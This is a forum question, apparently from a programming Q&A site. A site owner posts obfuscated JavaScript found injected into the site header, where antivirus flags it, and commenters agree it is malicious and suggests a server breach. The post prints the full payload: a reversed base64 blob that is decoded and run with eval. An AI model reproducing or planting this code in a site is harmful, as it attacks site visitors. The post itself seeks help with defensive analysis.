# Found strange javascript code in my sites header

Tags: javascript

I found some strange code in my websites header that is showing up as a virus on Kaspersky.

It looks like it has some sort of encoding or cypher in it. It would be great if someon could help me figure out what it was!

Code:

```
<script type="text/javascript">//<![CDATA[
    var Translator = new Translate([]);
    //]]></script><script language="javascript" type="text/javascript">var lII='=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3box3ajlGbjdjM891NywHZy92dzNXYwdjM8RGbph2Qk5WZwBXY8lGchlnclVXcqxHTSVFf0lWbiV3cu92NywHZhVGa85GdiN0M85GdiR0M8RHelR3NywHevJ2ajVGajdjM8R3YlxWZzdjM8RnblRnbvN0NywXYvRnYENDf0V3bl1WaURXZzBjM8FTY3MTM4UTMkhzMlNWOhZmM2AjN4IzMyQ2NiFTNlN2NmJ0N8l2Z3IDfu9Wa0F2YvxGfpJXY2hjM81mcvZ2NywXZ4IDfoNGdhNGR3wXbyZ2QzwXbyZGOywnclJnclZWZyxHdzVGd8d3bk5Wa3hjM8RXatJWdzdjM8t2Ypx2Yu92NywHdzVWdxVmUwRHdIxUTYBjM85WZw9GfxE2NzEDO1EDZ4MTZjlTYmJjNwYDOyMjMkdjYxUTZjdjZ5ADfwVGdzVmbvN0N8BHd0hGfjJ3c8Rnbl1WZsVUZ0FWZyNGf0V3brNWZoN2Q3wHMzMkM8JXY2FEM8VWbh50ZhRVeCNHduVWblxWR0V2Z81mcvZGfmVmc8VWdyR3QywnclRWYlhEdzVWdxVmU0V2c852b0RXdixHZlR2bj5WZsJXd8t2b8FTY3MTM4UTMkhzMlNWOhZmM2AjN4IzMyQ2NiFTNlN2Nmx3bm5Wa8lXZrZjM81WbvRGfu9Wa0F2YpxGcwF2NywXb5V2a8VWbh5Gdz9Ga2IDfvZmbpdjM8V2ZhBXZu92Nyw3bpRWYydjM8BDMwEDflRXYkBjM8lTO5kTO5kTO5gjM812bk5WYyxHevJ2ajVGajBjM8hGdh1EfjJ3c0V2Z8dmbpJHdTNEVV9Gd8hGdh1EOywHduVWb1N2bkBjM85GdixHd1BnbpJjM8R3YlxWZzBjM8FWZyFGd4VGdwIDfrx2YBBDfw5WawIDfzVmcpBHelBjM8RWZulmZlRmb1F0M8VGdhRGfxIUN8RmbzBjM8xGb15WQzw3aulGbHBjM8RHcpJ3YzFmdhpGfy92bsZGf0BXayN2cDNDflBXe0BjM8NHc0RHa3IDf0hXZ0JjM8d3d3xXM0IDf1NHfwU0M8BDOywXZtFmb4IDfoNGdh1GflBXYjNXZuVHflRXaydHfoRXYwBjM85GdiBjM8FmMywnbvRHd1JGMywnZlJHaCVDfl1mbCdDfw5Wa8RmblNHMyw3aulGbHxXeyRHMywXZt5GOywHd1BnbpBjM8RHcpJ3YzFmdhp2NywHcul2QzwHdp1mY1NHMywHculGOywHduVmbvBXbvNUSSVVZk92YuVGfl1mbwIDfu9Gd0VnYDJDf5JXZ1Fna81WeltGMyw3clh2Y0FWbwIDf0BXayN2c8Nna8VWdsFmd8ZjM0wnY4IDfyFmd4IDfulWb8RWa51GfpBjM8BHeFdWZSBjM8FzTPxXMxETMxETMxwnbvlGdj5WdmF0M8RWavZXQzwXZzxWYmNkM8VWbpRFdldGflNHblR0N8FTY3MTM4UTMkhzMlNWOhZmM2AjN4IzMyQ2NiFTNlN2NmhjM8RGZpRXZzdjM8lGRzwncvZGMywXZwF2YzV2X890TPxXZtFmb8BnbpR0M8VWar92bjxnchZHfklWetBjM8xHf8FTY3MTM4UTMkhzMlNWOhZmM2AjN4IzMyQ2NiFTNlN2NmBjM8NXZoNGdh1GOyw3dl5GRzwnbvlGdj5WdmhjM8RnblZXRoNWY0RXY85mc1RXZyBjM8ZWaBBDflRXYEBjM8BDRzwnYwIDfsxWQy9GdjVGblNVeyVWdxx3dl5GOywXbyZGMyw3ctBjM8FEM8JmNywHZuV2c8VGc5RHf05WZtV3YvRGRzwncl5WZ0NXaMRnblZXRkRWY8Rnbl1Wdj9GZ8RmbzxXMhdzMxgTNxQGOzU2Y5EmZyYDM2gjMzIDZ3IWM1U2Y3Y2Qyw3asNGfmlGMywHbsVnbENDfpJ0M8lmQ1wnchZHMyw3MxIDfoR3ZuVGb8BHd0hGMywHdpxGczxHbhZXZ8dmbpJHdT9Gd8BHeFdWZSxHdulUZzJXYwxXZk92QyFGaD12byZGf3Vmb8V2YhxGclJHflxWaodHfmlGfn5WayR3U852bpR3YuVnZ85mc1RXZyxHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCL4IjNsIjNscSKp03esADLpcCX8dCXoQzNucCX2kDf3kDf4kDf0kDfzkDfahDfZhDfwkDfxkDfykDf5kDfhlDfolDfplDfqlDfrlDfnlDfmlDfilDfjlDfklDfllDfYhDfXhDfGhDfHhDftlDfIhDfJhDfFhDfEhDf6hDf5hDfBhDfChDfDhDfKhDfLhDfThDfUhDfVhDfWhDfShDfRhDfNhDfMhDfOhDfPhDfQhDfslDfWlDf8dVO8xHW5wHV5w3U5w3T5wnT5wnW5wHU5wXU5wnU5wXW5wXMhxnNhx3NhxHNhxHMhxXNhxnMhx3MhxXV5wHT5wXd5wHf8xHf2lDf3lDf4lDf0lDfzlDfvlDfulDfwlDfxlDfylDf5lDf6lDfIlDfJlDfKlDfLlDfHlDfGlDfClDfBlDfDlDfNlDfElDfFlDf1kDfqhDf1dDf2dDf3dDf0dDfzdDfvdDfycDfwdDfxdDfydDf4dDf5dDfJdDfKdDfaZDfLdDfIdDfHdDf6dDfudDfFdDfGdDfMdDfVZDfrdDf2cDf1cDf4cDfWZDf5cDfhdDfZZDfEdDf3cDftdDfxcDfCdDfjdDfqdDfXZDfsdDfpdDfodDfDdDfkdDfldDfmdDfndDfidDfBdDf3hDf4hDfohDfphDfNdDfrhDfnhDfmhDfihDfjhDfkhDflhDfshDfthDf0hDf1hDf2hDfzhDfyhDfuhDfvhDfwhDfxhDfhhDf5gDfUdDfVdDfWdDfXdDfTdDfSdDfOdDfPdDfQdDfRdDfwcDfYdDfZdDf1gDf2gDf3gDfzcDf4gDf8xHf8xHf0gDfzgDfadDfwgDfxgDf0cDfTZDfYZDfUZDf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8x3JcxiM4wiM2wyJclSKpcCXcxFfnwFXchSdz4yJcxFX1NDfMVDfOVDfPVDfLVDfKVDfGVDfBVDfHVDfIVDfJVDfQVDfRVDfYVDfZVDfaVDfxYDfXVDfWVDfSVDfTVDfUVDfVVDf6VDf5VDf0YDfoVDfpVDfqVDfrVDfnVDfmVDfiVDfhVDfjVDfkVDflVDfsVDftVDf1VDf2VDf3VDf4VDf0VDfzVDfvVDfuVDfwVDfxVDfyVDf8NjN8tmN8NkN8hkN8RkN8VkN8ZkN8JkN8FkN8dnN8ZnN8hnN8lnN8pnN8dkN8JlN8BlN8FlN89kN81kN8lkN85kN8pkN8tkN8xkN8RnN8NmN8RmN8xHf8xXZ2wHfmZDf8xHfiZDfhZDf2YDf1YDf3YDf4YDf1ZDf5YDfnZDfoZDfwZDfxZDfyZDfzZDfvZDfuZDfqZDfpZDfsZDftZDfNVDfTRDf1QDfzNDf2QDf3QDf4QDf0QDfzQDfaNDfwQDfxQDfyQDf5QDfhRDfoRDfpRDfqRDfrRDfnRDfmRDfiRDfjRDfkRDfZNDfsRDfUNDfGNDfJNDfKNDfHNDfMNDf5NDf2NDfDNDf3NDf4NDf6NDfLNDfYNDfNNDfVNDfWNDfXNDfTNDfSNDfwYDfPNDfQNDfRNDflRDf4UDftRDf5UDfURDfVRDfWRDfSRDfRRDfNRDfFVDfPRDfQRDfFNDfYRDfCVDf1UDf2UDf3UDfzUDf8JTN8lFN8pFN8BTN8FTN8xEN8tEN8VHN8ZHN8dHN8F0M8RHN8NHN89GN85GN8BHN8xXc0wnc0wXe0wne0w3R0wHS0w3Q1wnS0wHR1wXR0wXQ0wHRzwnQzw3Q0wHfnwFXcxCR0wiM2wyJcxFX7kSKMhiexgCRx4Ca7kCRoE2Muo1OdBzWpcCXcxFXcxFXkNzJcxFXcxFXchSMz4Ca9oFIGtTKoNjLohiUrcCXcxFXcxFX9w2MmcCXcxFXcxFXrkCMz4CaoI1KnwFXcxFXcxVP4JjJnwFXcxFXcx1KnwFXcxFXcx1cy0jcy8zLwJjLCJzLvoDRycCXcxFXcxFX9kkMuQ0OpcCXcxFXcxFXzEzJcxFXcxFXchiSy4Ca9QEIGtzJcxFXcxFXcVUJzEzL3ETJyUSRl0SLyUiNlITJzUSOyUCOyUSSuskMlITJ1USOyUSOyUCSy4SRyUiRy4SOyUSOyUyNyUyRyUyQyUyNyUCTyUSTyUyUyUCOyUCMxUSelgjMlQlMlITJ2UiMlYTJwITJwITJwITJwITJyUiNlUTJ5ITJSJTJRJTJwITJwITJwITJwITJwITJwITJwITJwITJyUyMlkjMl4kMlYTJ5ITJ4ITJJ5yTyUSOyUCOyUCdlAlMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUialQWMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUialYmLpVCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUiMlYTJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUyMlkjMlEWMuEnMrcjMlQTJvJTJ3ITJr4mMrcjMlQTJrJTJ3ITJrwmMrcjMlQTJtJTJ4ITJJ5SclAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUSOyUyNyUCdy0iey0SQy0CevknMlMkMlcjMlQWLWJTJ4ITJ2JjLxVCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUiMlMTJ5ITJ3JTJVJjLlVyNyUiZzUCOyUyaz4SclAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUSOyUCOyUiazUSdlEXJ4UCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUiMlMTJ5ITJm5yUlk2MlQWMlgTJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUyMlkjMlcjMlU2MlgjMlc2MukjMlAVJtNjL5ITJ3ITJucjMlgjMlE3MuA3Mu82Ml42MlgTJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUSNlkjMloWJxITJm5yUlMWJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUiNlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJ2UCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUiMlMTJ5ITJr5SZlcjMlM2MlgjMlElL3USYlIUJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUSNlQVJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUyMlkjMlgVJr5SZlcjMlIzMlgjMlAnL3USYlIUJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUSNlkjMlAnL3USYlolMlMWJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUSNlkjMlsyKiVicuclMlIWJBVCWyUyRlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUSOyUyNyUSWyUCOyUydu8WJCVCOlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJ2UCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUCMyUiMlYTJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJwITJyUiNlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlITJzUSOyUyauUWJ3ITJzMTJ4ITJR5yclAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMlAjMl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';function lO1(data){var _1lllOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=_1lllOI.indexOf(data.charAt(i++));h2=_1lllOI.indexOf(data.charAt(i++));h3=_1lllOI.indexOf(data.charAt(i++));h4=_1lllOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _1ll(string){ var ret = '', i = 0;    for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(lO1(_1ll(lII)));
 </script>
```

Comment: That's indeed some malicious code. You should check your servers security.

Comment: @BobBrinks any idea what it is doing?

Comment: No. But it probably tries to install/run/check something on the pc's of people who visit your website. It also means someone has had write access (maybe root access) to your servers.